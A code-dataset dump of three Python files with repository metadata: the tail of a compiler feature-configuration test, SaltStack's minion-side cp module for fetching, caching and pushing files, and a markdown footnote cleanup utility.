        if not implies:
            return
        if isinstance(implies, str):
            implies = implies.split()
        if feature_name in implies:
            raise AssertionError(error_msg + "feature implies itself")
        for impl in implies:
            impl_dict = search_in.get(impl)
            if impl_dict is not None:
                if "disable" in impl_dict:
                    raise AssertionError(error_msg + "implies disabled feature '%s'" % impl)
                continue
            raise AssertionError(error_msg + "implies non-exist feature '%s'" % impl)
    def test_group(self, error_msg, search_in, feature_name, feature_dict):
        """Group entries must not collide with enabled feature names."""
        if feature_dict.get("disabled") is not None:
            return
        group = feature_dict.get("group", "")
        if not group:
            return
        if isinstance(group, str):
            group = group.split()
        for f in group:
            impl_dict = search_in.get(f)
            if not impl_dict or "disable" in impl_dict:
                continue
            raise AssertionError(error_msg +
                "in option 'group', '%s' already exists as a feature name" % f
            )
    def test_extra_checks(self, error_msg, search_in, feature_name, feature_dict):
        """Extra-check names must not collide with enabled feature names."""
        if feature_dict.get("disabled") is not None:
            return
        extra_checks = feature_dict.get("extra_checks", "")
        if not extra_checks:
            return
        if isinstance(extra_checks, str):
            extra_checks = extra_checks.split()
        for f in extra_checks:
            impl_dict = search_in.get(f)
            if not impl_dict or "disable" in impl_dict:
                continue
            raise AssertionError(error_msg +
                "in option 'extra_checks', extra test case '%s' already exists as a feature name" % f
            )
class TestConfFeatures(unittest.TestCase):
    """Validate the feature configuration for every (arch, compiler) pair."""
    def __init__(self, methodName="runTest"):
        unittest.TestCase.__init__(self, methodName)
        self.setup()
    def setup(self):
        # Disable config caching so each fake compiler starts from scratch.
        FakeCCompilerOpt.conf_nocache = True
    def test_features(self):
        # Instantiating _TestConfFeatures runs the validation hooks for the
        # arch+compiler combination injected via fake_info.
        for arch, compilers in arch_compilers.items():
            for cc in compilers:
                FakeCCompilerOpt.fake_info = arch + cc
                _TestConfFeatures()
if is_standalone:
    unittest.main()
| 35.638418 | 101 | 0.585447 |
382dc09d9e39a5b0271ddade339bd982e16f1ee3 | 24,754 | py | Python | salt/modules/cp.py | l2ol33rt/salt | ff68bbd9f4bda992a3e039822fb32f141e94347c | [
"Apache-2.0"
] | null | null | null | salt/modules/cp.py | l2ol33rt/salt | ff68bbd9f4bda992a3e039822fb32f141e94347c | [
"Apache-2.0"
] | null | null | null | salt/modules/cp.py | l2ol33rt/salt | ff68bbd9f4bda992a3e039822fb32f141e94347c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Minion side functions for salt-cp
'''
# Import python libs
from __future__ import absolute_import
import os
import logging
import fnmatch
# Import salt libs
import salt.minion
import salt.fileclient
import salt.utils
import salt.utils.files
import salt.utils.url
import salt.crypt
import salt.transport
from salt.exceptions import CommandExecutionError
from salt.ext.six.moves.urllib.parse import urlparse as _urlparse # pylint: disable=import-error,no-name-in-module
# Import 3rd-party libs
import salt.ext.six as six
log = logging.getLogger(__name__)
__proxyenabled__ = ['*']
def _auth():
    '''
    Return the minion's auth object, creating and caching it on first use
    '''
    try:
        return __context__['auth']
    except KeyError:
        sauth = salt.crypt.SAuth(__opts__)
        __context__['auth'] = sauth
        return sauth
def _gather_pillar(pillarenv, pillar_override):
    '''
    Compile fresh pillar data for this minion, layering any override on top
    '''
    pillar_obj = salt.pillar.get_pillar(
        __opts__,
        __grains__,
        __opts__['id'],
        __opts__['environment'],
        pillar=pillar_override,
        pillarenv=pillarenv
    )
    compiled = pillar_obj.compile_pillar()
    # An explicit override dict always wins over compiled values
    if pillar_override and isinstance(pillar_override, dict):
        compiled.update(pillar_override)
    return compiled
def recv(files, dest):
    '''
    Used with salt-cp: write each chunk in the ``files`` dict to ``dest``.

    This is the receiving end of the small/fast copies pushed by the master
    via salt-cp. It does not work via the CLI.
    '''
    results = {}
    for path, data in six.iteritems(files):
        same_basename = os.path.basename(path) == os.path.basename(dest)
        if same_basename and not os.path.isdir(dest):
            # dest names the file itself
            target = dest
        elif os.path.isdir(dest):
            # dest is a directory: keep the source basename
            target = os.path.join(dest, os.path.basename(path))
        elif os.path.isdir(os.path.dirname(dest)):
            target = dest
        else:
            return 'Destination unavailable'
        try:
            with salt.utils.fopen(target, 'w+') as fp_:
                fp_.write(data)
            results[target] = True
        except IOError:
            results[target] = False
    return results
def _mk_client():
    '''
    Create a file client and cache it in the context.

    Each file client corresponds to a unique copy of the opts dictionary,
    hence the cache key derived from id(__opts__).
    '''
    context_key = 'cp.fileclient_{0}'.format(id(__opts__))
    if context_key not in __context__:
        __context__[context_key] = salt.fileclient.get_file_client(__opts__)
def _client():
    '''
    Return the cached file client for the current opts, creating it if needed
    '''
    _mk_client()
    client_key = 'cp.fileclient_{0}'.format(id(__opts__))
    return __context__[client_key]
def _render_filenames(path, dest, saltenv, template, **kw):
    '''
    Process markup in the :param:`path` and :param:`dest` variables (NOT the
    files under the paths they ultimately point to) according to the markup
    format provided by :param:`template`.

    Returns the rendered ``(path, dest)`` tuple; when no template engine is
    given the inputs are returned untouched. Raises CommandExecutionError for
    an unknown engine or a failed render.
    '''
    if not template:
        return (path, dest)
    # render the path as a template using path_template_engine as the engine
    if template not in salt.utils.templates.TEMPLATE_REGISTRY:
        raise CommandExecutionError(
            'Attempted to render file paths with unavailable engine '
            '{0}'.format(template)
        )
    kwargs = {}
    kwargs['salt'] = __salt__
    # A caller-supplied pillar/pillarenv forces a fresh pillar compile
    if 'pillarenv' in kw or 'pillar' in kw:
        pillarenv = kw.get('pillarenv', __opts__.get('pillarenv'))
        kwargs['pillar'] = _gather_pillar(pillarenv, kw.get('pillar'))
    else:
        kwargs['pillar'] = __pillar__
    kwargs['grains'] = __grains__
    kwargs['opts'] = __opts__
    kwargs['saltenv'] = saltenv
    def _render(contents):
        '''
        Render :param:`contents` into a literal pathname by writing it to a
        temp file, rendering that file, and returning the result.
        '''
        # write out path to temp file
        tmp_path_fn = salt.utils.files.mkstemp()
        with salt.utils.fopen(tmp_path_fn, 'w+') as fp_:
            fp_.write(contents)
        data = salt.utils.templates.TEMPLATE_REGISTRY[template](
            tmp_path_fn,
            to_str=True,
            **kwargs
        )
        salt.utils.safe_rm(tmp_path_fn)
        if not data['result']:
            # Failed to render the template
            raise CommandExecutionError(
                'Failed to render file path with error: {0}'.format(
                    data['data']
                )
            )
        else:
            return data['data']
    path = _render(path)
    dest = _render(dest)
    return (path, dest)
def get_file(path,
             dest,
             saltenv='base',
             makedirs=False,
             template=None,
             gzip=None,
             **kwargs):
    '''
    Used to get a single file from the salt master

    CLI Example:

    .. code-block:: bash

        salt '*' cp.get_file salt://path/to/file /minion/dest

    Both the source and destination file names may be rendered as templates:

    .. code-block:: bash

        salt '*' cp.get_file "salt://{{grains.os}}/vimrc" /etc/vimrc template=jinja

    For larger, highly-compressible files (e.g. pretty-printed JSON or YAML),
    pass ``gzip`` with a compression level from 1 (lightest, least CPU on the
    master and minion) to 9 (heaviest). gzip is CPU-intensive, so use it only
    when the compression ratio is very high.

    The fileserver environment can be selected either with the ``saltenv``
    argument or with a querystring in the ``salt://`` URL; the two commands
    below are equivalent (quote the URL if your shell requires it):

    .. code-block:: bash

        salt '*' cp.get_file salt://foo/bar.conf /etc/foo/bar.conf saltenv=config
        salt '*' cp.get_file salt://foo/bar.conf?saltenv=config /etc/foo/bar.conf
    '''
    path, dest = _render_filenames(path, dest, saltenv, template, **kwargs)
    # A saltenv embedded in the URL takes precedence over the argument
    path, senv = salt.utils.url.split_env(path)
    if senv:
        saltenv = senv
    # No fileserver hash means the file does not exist in this environment
    if not hash_file(path, saltenv):
        return ''
    return _client().get_file(path, dest, makedirs, saltenv, gzip)
def get_template(path,
                 dest,
                 template='jinja',
                 saltenv='base',
                 makedirs=False,
                 **kwargs):
    '''
    Render a file from the master as a template before setting it down.

    Note that the argument order differs from ``fileclient.cp`` so as not to
    break the historical API.

    CLI Example:

    .. code-block:: bash

        salt '*' cp.get_template salt://path/to/template /minion/dest
    '''
    # Inject the standard rendering dunders unless the caller supplied them
    kwargs.setdefault('salt', __salt__)
    kwargs.setdefault('pillar', __pillar__)
    kwargs.setdefault('grains', __grains__)
    kwargs.setdefault('opts', __opts__)
    return _client().get_template(
        path,
        dest,
        template,
        makedirs,
        saltenv,
        **kwargs)
def get_dir(path, dest, saltenv='base', template=None, gzip=None, **kwargs):
    '''
    Recursively copy a directory from the salt master.

    Supports the same ``template`` and ``gzip`` arguments as ``cp.get_file``.

    CLI Example:

    .. code-block:: bash

        salt '*' cp.get_dir salt://path/to/dir/ /minion/dest
    '''
    path, dest = _render_filenames(path, dest, saltenv, template, **kwargs)
    return _client().get_dir(path, dest, saltenv, gzip)
def get_url(path, dest='', saltenv='base', makedirs=False):
    '''
    Used to get a single file from a URL.

    path
        A URL to download a file from. Supported URL schemes are: ``salt://``,
        ``http://``, ``https://``, ``ftp://``, ``s3://``, ``swift://`` and
        ``file://`` (local filesystem). If no scheme was specified, this is
        equivalent of using ``file://``.

        If a ``file://`` URL is given, the function just returns absolute path
        to that file on a local filesystem.

        The function returns ``False`` if Salt was unable to fetch a file from
        a ``salt://`` URL.

    dest
        The default behaviour is to write the fetched file to the given
        destination path. If this parameter is omitted or set as empty string
        (``''``), the function places the remote file on the local filesystem
        inside the Minion cache directory and returns the path to that file.

        .. note::

            To simply return the file contents instead, set destination to
            ``None``. This works with ``salt://``, ``http://``, ``https://``
            and ``file://`` URLs. The files fetched by ``http://`` and
            ``https://`` will not be cached.

    saltenv : base
        Salt fileserver environment from which to retrieve the file. Ignored
        if ``path`` is not a ``salt://`` URL.

    CLI Example:

    .. code-block:: bash

        salt '*' cp.get_url salt://my/file /tmp/this_file_is_mine
        salt '*' cp.get_url http://www.slashdot.org /tmp/index.html
    '''
    # A string destination (including '') means "write to disk"; any other
    # value (e.g. None) means "return the contents without caching".
    write_to_disk = isinstance(dest, six.string_types)
    client = _client()
    if write_to_disk:
        result = client.get_url(path, dest, makedirs, saltenv)
    else:
        result = client.get_url(path, None, makedirs, saltenv, no_cache=True)
    if not result:
        log.error(
            'Unable to fetch file {0} from saltenv {1}.'.format(
                path, saltenv
            )
        )
    return result
def get_file_str(path, saltenv='base'):
    '''
    Download a file from a URL to the Minion cache directory and return the
    contents of that file

    Returns ``False`` if Salt was unable to cache a file from a URL.

    CLI Example:

    .. code-block:: bash

        salt '*' cp.get_file_str salt://my/file
    '''
    cached_path = cache_file(path, saltenv)
    if not isinstance(cached_path, six.string_types):
        # Caching failed; propagate the failure value (e.g. False) as-is.
        return cached_path
    with salt.utils.fopen(cached_path, 'r') as handle:
        return handle.read()
def cache_file(path, saltenv='base'):
    '''
    Used to cache a single file on the Minion

    Returns the location of the new cached file on the Minion.

    CLI Example:

    .. code-block:: bash

        salt '*' cp.cache_file salt://path/to/file

    There are two ways of defining the fileserver environment (a.k.a.
    ``saltenv``) from which to cache the file. One is to use the ``saltenv``
    parameter, and the other is to use a querystring syntax in the ``salt://``
    URL. The below two examples are equivalent:

    .. code-block:: bash

        salt '*' cp.cache_file salt://foo/bar.conf saltenv=config
        salt '*' cp.cache_file salt://foo/bar.conf?saltenv=config

    If the path being cached is a ``salt://`` URI, and the path does not exist,
    then ``False`` will be returned.

    .. note::
        It may be necessary to quote the URL when using the querystring method,
        depending on the shell being used to run the command.
    '''
    # Per-run memoization key; __context__ is shared state for this salt run.
    contextkey = '{0}_|-{1}_|-{2}'.format('cp.cache_file', path, saltenv)
    path_is_remote = _urlparse(path).scheme in ('http', 'https', 'ftp')
    try:
        if path_is_remote and contextkey in __context__:
            # Prevent multiple caches in the same salt run. Affects remote URLs
            # since the master won't know their hash, so the fileclient
            # wouldn't be able to prevent multiple caches if we try to cache
            # the remote URL more than once.
            if os.path.isfile(__context__[contextkey]):
                return __context__[contextkey]
            else:
                # File is in __context__ but no longer exists in the minion
                # cache, get rid of the context key and re-cache below.
                # Accounts for corner case where file is removed from minion
                # cache between cp.cache_file calls in the same salt-run.
                __context__.pop(contextkey)
    except AttributeError:
        # __context__ may not behave like a dict outside a normal salt run;
        # fall through and cache unconditionally.
        pass
    # A ?saltenv=... querystring in the URL overrides the saltenv argument.
    path, senv = salt.utils.url.split_env(path)
    if senv:
        saltenv = senv
    result = _client().cache_file(path, saltenv)
    if not result:
        log.error(
            'Unable to cache file \'{0}\' from saltenv \'{1}\'.'.format(
                path, saltenv
            )
        )
    if path_is_remote:
        # Cache was successful, store the result in __context__ to prevent
        # multiple caches (see above).
        __context__[contextkey] = result
    return result
def cache_files(paths, saltenv='base'):
    '''
    Used to gather many files from the Master, the gathered files will be
    saved in the minion cachedir reflective to the paths retrieved from the
    Master

    CLI Example:

    .. code-block:: bash

        salt '*' cp.cache_files salt://pathto/file1,salt://pathto/file1

    The fileserver environment may be set either with the ``saltenv``
    parameter or with a ``?saltenv=...`` querystring on each ``salt://`` URL;
    the querystring form allows mixing environments in a single command:

    .. code-block:: bash

        salt '*' cp.cache_files salt://foo/bar.conf?saltenv=config1,salt://foo/bar.conf?saltenv=config2

    .. note::
        It may be necessary to quote the URL when using the querystring
        method, depending on the shell being used to run the command.
    '''
    client = _client()
    return client.cache_files(paths, saltenv)
def cache_dir(path, saltenv='base', include_empty=False, include_pat=None,
              exclude_pat=None):
    '''
    Download and cache everything under a directory from the master

    include_pat : None
        Glob or regex to narrow down the files cached from the given path. If
        matching with a regex, the regex must be prefixed with ``E@``,
        otherwise the expression will be interpreted as a glob.

        .. versionadded:: 2014.7.0

    exclude_pat : None
        Glob or regex to exclude certain files from being cached from the
        given path. If matching with a regex, the regex must be prefixed with
        ``E@``, otherwise the expression will be interpreted as a glob.

        .. note::
            If used with ``include_pat``, files matching this pattern will be
            excluded from the subset of files defined by ``include_pat``.

        .. versionadded:: 2014.7.0

    CLI Examples:

    .. code-block:: bash

        salt '*' cp.cache_dir salt://path/to/dir
        salt '*' cp.cache_dir salt://path/to/dir include_pat='E@*.py$'
    '''
    client = _client()
    return client.cache_dir(path, saltenv, include_empty, include_pat,
                            exclude_pat)
def cache_master(saltenv='base'):
    '''
    Retrieve all of the files on the master and cache them locally

    CLI Example:

    .. code-block:: bash

        salt '*' cp.cache_master
    '''
    client = _client()
    return client.cache_master(saltenv)
def cache_local_file(path):
    '''
    Cache a local file on the minion in the localfiles cache

    CLI Example:

    .. code-block:: bash

        salt '*' cp.cache_local_file /etc/hosts
    '''
    # Nothing to do for a path that does not exist on this minion.
    if not os.path.exists(path):
        return ''
    cached = is_cached(path)
    if cached:
        # Already cached: reuse the cached copy if its checksum still
        # matches the source file.
        if hash_file(path)['hsum'] == hash_file(cached)['hsum']:
            return cached
    # Not cached yet, or the source has changed since it was cached.
    return _client().cache_local_file(path)
def list_states(saltenv='base'):
    '''
    List all of the available state modules in an environment

    CLI Example:

    .. code-block:: bash

        salt '*' cp.list_states
    '''
    client = _client()
    return client.list_states(saltenv)
def list_master(saltenv='base', prefix=''):
    '''
    List all of the files stored on the master

    CLI Example:

    .. code-block:: bash

        salt '*' cp.list_master
    '''
    client = _client()
    return client.file_list(saltenv, prefix)
def list_master_dirs(saltenv='base', prefix=''):
    '''
    List all of the directories stored on the master

    CLI Example:

    .. code-block:: bash

        salt '*' cp.list_master_dirs
    '''
    client = _client()
    return client.dir_list(saltenv, prefix)
def list_master_symlinks(saltenv='base', prefix=''):
    '''
    List all of the symlinks stored on the master

    CLI Example:

    .. code-block:: bash

        salt '*' cp.list_master_symlinks
    '''
    client = _client()
    return client.symlink_list(saltenv, prefix)
def list_minion(saltenv='base'):
    '''
    List all of the files cached on the minion

    CLI Example:

    .. code-block:: bash

        salt '*' cp.list_minion
    '''
    client = _client()
    return client.file_local_list(saltenv)
def is_cached(path, saltenv='base'):
    '''
    Return a boolean if the given path on the master has been cached on the
    minion

    CLI Example:

    .. code-block:: bash

        salt '*' cp.is_cached salt://path/to/file
    '''
    client = _client()
    return client.is_cached(path, saltenv)
def hash_file(path, saltenv='base'):
    '''
    Return the hash of a file, to get the hash of a file on the
    salt master file server prepend the path with salt://<file on server>
    otherwise, prepend the file with / for a local file.

    CLI Example:

    .. code-block:: bash

        salt '*' cp.hash_file salt://path/to/file
    '''
    # A ?saltenv=... querystring in the URL overrides the saltenv argument.
    path, query_env = salt.utils.url.split_env(path)
    if query_env:
        saltenv = query_env
    return _client().hash_file(path, saltenv)
def stat_file(path, saltenv='base', octal=True):
    '''
    Return the permissions of a file, to get the permissions of a file on the
    salt master file server prepend the path with salt://<file on server>
    otherwise, prepend the file with / for a local file.

    CLI Example:

    .. code-block:: bash

        salt '*' cp.stat_file salt://path/to/file
    '''
    # A ?saltenv=... querystring in the URL overrides the saltenv argument.
    path, query_env = salt.utils.url.split_env(path)
    if query_env:
        saltenv = query_env
    stat_result = _client().hash_and_stat_file(path, saltenv)[1]
    if stat_result is None:
        return None
    mode = stat_result[0]
    # Only convert when octal is exactly True, preserving the historical
    # strict-identity check.
    return salt.utils.st_mode_to_octal(mode) if octal is True else mode
def push(path, keep_symlinks=False, upload_path=None, remove_source=False):
    '''
    WARNING Files pushed to the master will have global read permissions..

    Push a file from the minion up to the master, the file will be saved to
    the salt master in the master's minion files cachedir
    (defaults to ``/var/cache/salt/master/minions/minion-id/files``)

    Since this feature allows a minion to push a file up to the master server
    it is disabled by default for security purposes. To enable, set
    ``file_recv`` to ``True`` in the master configuration file, and restart
    the master.

    keep_symlinks
        Keep the path value without resolving its canonical form

    upload_path
        Provide a different path inside the master's minion files cachedir

    remove_source
        Remove the source file on the minion

        .. versionadded:: 2016.3.0

    CLI Example:

    .. code-block:: bash

        salt '*' cp.push /etc/fstab
        salt '*' cp.push /etc/system-release keep_symlinks=True
        salt '*' cp.push /etc/fstab upload_path='/new/path/fstab'
        salt '*' cp.push /tmp/filename remove_source=True
    '''
    log.debug('Trying to copy \'{0}\' to master'.format(path))
    # Reject relative paths and obvious traversal attempts outright.
    if '../' in path or not os.path.isabs(path):
        log.debug('Path must be absolute, returning False')
        return False
    if not keep_symlinks:
        path = os.path.realpath(path)
    if not os.path.isfile(path):
        log.debug('Path failed os.path.isfile check, returning False')
        return False
    auth = _auth()
    if upload_path:
        if '../' in upload_path:
            log.debug('Path must be absolute, returning False')
            log.debug('Bad path: {0}'.format(upload_path))
            return False
        load_path = upload_path.lstrip(os.sep)
    else:
        load_path = path.lstrip(os.sep)
    # Normalize the path. This does not eliminate
    # the possibility that relative entries will still be present
    load_path_normal = os.path.normpath(load_path)
    # If this is Windows and a drive letter is present, remove it
    load_path_split_drive = os.path.splitdrive(load_path_normal)[1]
    # Finally, split the remaining path into a list for delivery to the master
    load_path_list = [_f for _f in load_path_split_drive.split(os.sep) if _f]
    load = {'cmd': '_file_recv',
            'id': __opts__['id'],
            'path': load_path_list,
            'tok': auth.gen_token('salt')}
    channel = salt.transport.Channel.factory(__opts__)
    with salt.utils.fopen(path, 'rb') as fp_:
        init_send = False
        while True:
            load['loc'] = fp_.tell()
            load['data'] = fp_.read(__opts__['file_buffer_size'])
            if not load['data'] and init_send:
                # An empty read after at least one send means EOF: the whole
                # file has been delivered.
                if remove_source:
                    try:
                        salt.utils.rm_rf(path)
                        log.debug('Removing source file \'{0}\''.format(path))
                    except IOError:
                        # Bug fix: the original split this string with a
                        # backslash-newline *inside* the literal, which
                        # injected the continuation line's indentation into
                        # the logged message. Use implicit concatenation.
                        log.error('cp.push failed to remove file '
                                  '\'{0}\''.format(path))
                        return False
                return True
            ret = channel.send(load)
            if not ret:
                log.error('cp.push Failed transfer failed. Ensure master has '
                          '\'file_recv\' set to \'True\' and that the file '
                          'is not larger than the \'file_recv_size_max\' '
                          'setting on the master.')
                return ret
            init_send = True
def push_dir(path, glob=None, upload_path=None):
    '''
    Push a directory from the minion up to the master, the files will be saved
    to the salt master in the master's minion files cachedir (defaults to
    ``/var/cache/salt/master/minions/minion-id/files``). It also has a glob
    for matching specific files using globbing.

    .. versionadded:: 2014.7.0

    Since this feature allows a minion to push files up to the master server it
    is disabled by default for security purposes. To enable, set ``file_recv``
    to ``True`` in the master configuration file, and restart the master.

    upload_path
        Provide a different path and directory name inside the master's minion
        files cachedir

    CLI Example:

    .. code-block:: bash

        salt '*' cp.push_dir /usr/lib/mysql
        salt '*' cp.push_dir /usr/lib/mysql upload_path='/newmysql/path'
        salt '*' cp.push_dir /etc/modprobe.d/ glob='*.conf'
    '''
    # Reject relative paths and obvious traversal attempts outright.
    if '../' in path or not os.path.isabs(path):
        return False
    path = os.path.realpath(path)
    if os.path.isfile(path):
        # A single file: defer directly to cp.push.
        return push(path, upload_path=upload_path)
    # Collect every file under the directory tree.
    filelist = []
    for root, _, files in os.walk(path):
        filelist += [os.path.join(root, tmpfile) for tmpfile in files]
    if glob is not None:
        # Only push files whose basename matches the glob pattern.
        filelist = [fi for fi in filelist
                    if fnmatch.fnmatch(os.path.basename(fi), glob)]
    if not filelist:
        return False
    for tmpfile in filelist:
        if upload_path and tmpfile.startswith(path):
            # Bug fix: the original used tmpfile.replace(path, ''), which
            # removes *every* occurrence of the source path string inside
            # the file's full path and could corrupt the destination when
            # the prefix repeats. os.path.relpath strips only the leading
            # directory prefix.
            rel_path = os.path.relpath(tmpfile, path)
            tmpupload_path = os.path.join(os.path.sep,
                                          upload_path.strip(os.path.sep),
                                          rel_path)
        else:
            tmpupload_path = upload_path
        ret = push(tmpfile, upload_path=tmpupload_path)
        if not ret:
            return ret
    return True
| 31.02005 | 115 | 0.615739 |
be26a0f6d2d3766d1e5edb9faaf8810ae9630ec9 | 3,172 | py | Python | utils.py | zsilver1/dictus | 7c5fddda626a134340c5062e3ce4c2c420e300c8 | [
"MIT"
] | null | null | null | utils.py | zsilver1/dictus | 7c5fddda626a134340c5062e3ce4c2c420e300c8 | [
"MIT"
] | null | null | null | utils.py | zsilver1/dictus | 7c5fddda626a134340c5062e3ce4c2c420e300c8 | [
"MIT"
] | null | null | null | from typing import List, Dict, Set, Tuple
import os
import shutil
import re
# Matches an in-text footnote reference such as "[^1]" or "[^note]".
FOOTNOTE_LINK = re.compile(r"\[\^([\w]+)\]")
# Matches a footnote definition line such as "[^1]: some text".
FOOTNOTE_LABEL = re.compile(r"^\[\^([\w]+)]:\s?(.*)")


def cleanup_md_file(filename: str, backup: bool = True):
    """Normalize a markdown dictionary file in place.

    Sorts the ``# header`` sections alphabetically, keeps any pre-header
    preamble first, renumbers numeric footnotes in order of first use, and
    moves all footnote definitions to the end of the file.

    :param filename: path of the markdown file to rewrite
    :param backup: when True, write a copy to ``<filename>.backup`` first
    """
    if backup:
        # Bug fix: the backup destination was the literal string
        # "(unknown).backup" instead of being derived from the input path.
        shutil.copyfile(filename, f"{filename}.backup")
    headers: List[str] = []
    # map of header -> sub-contents
    header_contents: Dict[str, str] = {}
    first_header_line = -1
    # map of original footnote number to its label
    footnote_key_to_label: Dict[str, str] = {}
    # list of footnote labels in order
    fixed_footnotes: List[Tuple[str, str]] = []
    footnote_set: Set[str] = set()
    with open(filename) as f:
        contents = f.readlines()
    hit_footers = False
    current_header = None
    current_contents: List[str] = []
    for i, line in enumerate(contents):
        if line.strip().startswith("# "):
            if first_header_line < 0:
                first_header_line = i
            header = line[2:].strip()
            if current_header:
                header_contents[current_header] = "".join(current_contents)
                current_contents = []
            headers.append(header)
            current_header = header
        elif m := FOOTNOTE_LABEL.match(line):
            # Footnote definitions are collected, not copied verbatim;
            # they are re-emitted at the end of the file.
            hit_footers = True
            footnote_key_to_label[m.group(1)] = m.group(2)
        elif current_header:
            if not hit_footers:
                current_contents.append(line)
    if current_header:
        header_contents[current_header] = "".join(current_contents)
    result: List[str] = []
    # we now know the correct order of the file
    # first output pre-header lines
    for i, line in enumerate(contents):
        if i >= first_header_line:
            break
        result.append(line)
    headers.sort()
    old_to_new_footnotes: Dict[str, str] = {}
    cur_footnote_index = 1

    def _repl(m):
        # Renumber numeric footnote references in order of first use;
        # named (non-numeric) footnotes keep their labels.
        nonlocal cur_footnote_index
        if m.group(1) not in old_to_new_footnotes:
            if m.group(1).isnumeric():
                old_to_new_footnotes[m.group(1)] = str(cur_footnote_index)
                cur_footnote_index += 1
                return f"[^{cur_footnote_index - 1}]"
            else:
                return m.group()
        return f"[^{old_to_new_footnotes[m.group(1)]}]"

    for header in headers:
        text = header_contents[header]
        for key in FOOTNOTE_LINK.findall(text):
            # Deduplicate by label text so identical footnotes merge.
            if footnote_key_to_label[key] not in footnote_set:
                fixed_footnotes.append((key, footnote_key_to_label[key]))
                footnote_set.add(footnote_key_to_label[key])
        text = re.sub(FOOTNOTE_LINK, _repl, text)
        result.append(f"# {header}\n")
        result.append(text)
    # finish with footnotes
    index = 1
    for footnote in fixed_footnotes:
        key, label = footnote
        if key.isnumeric():
            result.append(f"[^{index}]: {label}{os.linesep}{os.linesep}")
            index += 1
        else:
            result.append(f"[^{key}]: {label}{os.linesep}{os.linesep}")
    result_str = "".join(result).rstrip()
    with open(filename, "w") as f:
        f.write(result_str)
| 31.098039 | 75 | 0.592055 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.